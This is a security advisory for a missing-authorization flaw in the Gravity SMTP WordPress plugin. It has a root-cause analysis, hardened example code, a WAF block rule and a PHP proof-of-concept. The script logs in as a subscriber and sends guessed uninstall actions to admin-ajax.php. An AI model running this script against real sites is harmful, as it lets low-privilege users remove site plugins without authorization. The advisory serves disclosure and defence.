Atomic Edge analysis of CVE-2026-4162 (metadata-based):
This vulnerability is a missing authorization flaw in the Gravity SMTP WordPress plugin versions up to and including 2.1.4. The vulnerability allows authenticated attackers with subscriber-level permissions or higher to uninstall and deactivate the plugin and delete its options. The CVSS score of 7.1 (High) reflects the combination of low attack complexity, no user interaction required, and high impact on integrity with low impact on availability.
Atomic Edge research infers the root cause is a WordPress AJAX handler or admin POST endpoint that lacks proper capability checks. The CWE-862 classification indicates the plugin likely registers a function for uninstalling or deactivating the plugin via a WordPress hook (such as wp_ajax_ or admin_post_) but fails to verify the user has the required administrative capabilities (like manage_options or activate_plugins). This inference is based on the vulnerability description and common WordPress plugin patterns. The description confirms the flaw exists but does not provide the exact code location.
Exploitation requires an authenticated attacker with subscriber-level access. The attacker sends a crafted HTTP POST request to the WordPress AJAX endpoint (/wp-admin/admin-ajax.php) or the admin-post endpoint (/wp-admin/admin-post.php). The request includes an action parameter specific to the Gravity SMTP plugin’s uninstall or deactivation functionality. The exact action name is not confirmed from metadata, but plausible values include gravitysmtp_uninstall, gravitysmtp_deactivate, or similar. The request may also include a nonce parameter, but the vulnerability description notes CSRF is possible, indicating nonce verification is also missing or insufficient. A successful request triggers the plugin’s uninstall routine, removing its options and deactivating it.
The remediation likely involves adding proper capability checks to the vulnerable endpoint. The patched version (2.1.5) should verify the current user has appropriate administrative privileges (like manage_options) before executing any plugin uninstall, deactivation, or option deletion operations. The fix should also include proper nonce verification to mitigate the CSRF vector mentioned in the description. These changes align with WordPress security best practices for protecting administrative actions.
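The following is an added illustration, not Gravity SMTP's actual code (which this advisory does not have): a hypothetical plugin called "acme_mailer" showing the CWE-862 handler pattern inferred in the root-cause paragraph above next to the hardened form the remediation paragraph calls for. The hook name, option name, nonce action and capability names are assumptions chosen for the example; the WordPress functions used (add_action, check_ajax_referer, current_user_can, wp_send_json_error, delete_option, deactivate_plugins, wp_create_nonce) are real core APIs.

```php
<?php
/**
 * Added illustration for this advisory, not Gravity SMTP's code.
 * Hypothetical plugin "acme_mailer": a CWE-862 AJAX uninstall handler
 * (kept for contrast, never hooked) and the hardened handler that is hooked.
 * Hook, option, nonce-action and capability names are assumptions for the example.
 */

// --- Vulnerable pattern (for contrast only; NOT registered with add_action) ---
// Every wp_ajax_* hook is reachable by any logged-in user via admin-ajax.php,
// so without a capability check a subscriber can run this, and without a nonce
// a malicious page can make an administrator's browser submit it (the CSRF vector).
function acme_mailer_uninstall_vulnerable() {
    delete_option( 'acme_mailer_settings' );
    deactivate_plugins( plugin_basename( __FILE__ ) );
    wp_send_json_success( array( 'message' => 'Plugin removed.' ) );
}

// --- Hardened pattern ---
add_action( 'wp_ajax_acme_mailer_uninstall', 'acme_mailer_uninstall_hardened' );

function acme_mailer_uninstall_hardened() {
    // 1. CSRF defence: the POST must carry a nonce minted for this exact action.
    //    check_ajax_referer() responds 403 and terminates the request on failure.
    check_ajax_referer( 'acme_mailer_uninstall', 'nonce' );

    // 2. Authorization: only a user who may change settings and (de)activate plugins.
    //    current_user_can() is the check the vulnerable handler lacks (CWE-862).
    if ( ! current_user_can( 'manage_options' ) || ! current_user_can( 'activate_plugins' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // Only after both checks pass do the destructive operations run.
    delete_option( 'acme_mailer_settings' );
    deactivate_plugins( plugin_basename( __FILE__ ) );
    wp_send_json_success( array( 'message' => 'Plugin removed.' ) );
}

// The settings page that offers the button mints the matching nonce; the page's
// JavaScript then POSTs action=acme_mailer_uninstall and nonce=<value> to admin-ajax.php.
function acme_mailer_render_uninstall_button() {
    if ( ! current_user_can( 'manage_options' ) ) {
        return; // Do not show the control to users who are not allowed to use it.
    }
    $nonce = wp_create_nonce( 'acme_mailer_uninstall' );
    printf(
        '<button type="button" id="acme-mailer-uninstall" data-nonce="%s">Uninstall Acme Mailer</button>',
        esc_attr( $nonce )
    );
}
```

The two checks are not interchangeable: a nonce only proves the request originated from a page WordPress rendered for the current user, so a subscriber who obtains a valid nonce would still pass it, and only the current_user_can() check stops the subscriber-level exploitation this advisory describes. Conversely the capability check alone leaves the CSRF vector open, which is why the patched version is expected to add both.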
Exploitation leads to complete plugin uninstallation and option deletion. This constitutes a high integrity impact (I:H) as the attacker can alter the site’s configuration and disable a core service (email delivery). The low availability impact (A:L) reflects potential disruption to email functionality but not total site outage. Attackers could disable security or monitoring plugins in a chain attack. The CSRF vector allows exploitation via a malicious link or site, increasing the attack surface.
Here you will find our ModSecurity-compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-4162 (metadata-based)
# This rule blocks exploitation of the missing authorization vulnerability in Gravity SMTP plugin.
# The rule targets the AJAX endpoint with specific action parameters used for uninstall/deactivation.
# The path is matched exactly against REQUEST_FILENAME (which, unlike REQUEST_URI, excludes the query
# string, so "admin-ajax.php?x=1" cannot slip past the check); the chained rule uses @pm, a
# case-insensitive phrase match, against the inferred action names.
SecRule REQUEST_FILENAME "@streq /wp-admin/admin-ajax.php" \
    "id:20264162,phase:2,deny,status:403,chain,msg:'CVE-2026-4162: Gravity SMTP Missing Authorization Exploit Attempt',severity:'CRITICAL',tag:'CVE-2026-4162',tag:'WordPress',tag:'Plugin-GravitySMTP'"
    SecRule ARGS_POST:action "@pm gravitysmtp_uninstall gravitysmtp_deactivate gravitysmtp_delete_options gravitysmtp_remove" \
        "t:lowercase"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4162 - Gravity SMTP <= 2.1.4 - Missing Authorization to Authenticated (Subscriber+) Plugin Uninstall
/**
 * Proof of Concept for CVE-2026-4162.
 * This script simulates an authenticated subscriber-level attacker exploiting the missing authorization
 * to trigger plugin uninstall/deactivation. The exact AJAX action name is inferred from plugin patterns.
 * Assumptions:
 * 1. The vulnerable endpoint is /wp-admin/admin-ajax.php (common for WordPress AJAX handlers).
 * 2. The action parameter is 'gravitysmtp_uninstall' or similar (inferred from plugin slug).
 * 3. No nonce is required (CSRF vector indicates missing nonce check).
 * 4. The attacker has valid subscriber-level WordPress credentials.
 */
$target_url = 'https://victim-site.com'; // CHANGE THIS
$username = 'subscriber_user'; // CHANGE THIS - subscriber-level account
$password = 'subscriber_pass'; // CHANGE THIS

// Step 1: Authenticate to WordPress to obtain session cookies
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); // Save session cookies
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // For testing only
$response = curl_exec($ch);

// Step 2: Send exploit payload to AJAX endpoint
// Attempt multiple plausible action names based on common plugin patterns
$possible_actions = ['gravitysmtp_uninstall', 'gravitysmtp_deactivate', 'gravitysmtp_delete_options', 'gravitysmtp_remove'];
foreach ($possible_actions as $action) {
    curl_setopt($ch, CURLOPT_URL, $ajax_url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
        'action' => $action
    ]));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $ajax_response = curl_exec($ch);
    echo "Attempting action: $action\n";
    echo "Response: $ajax_response\n\n";
    // Optional: Add delay between attempts
    sleep(1);
}
curl_close($ch);
unlink('cookies.txt'); // Clean up
?>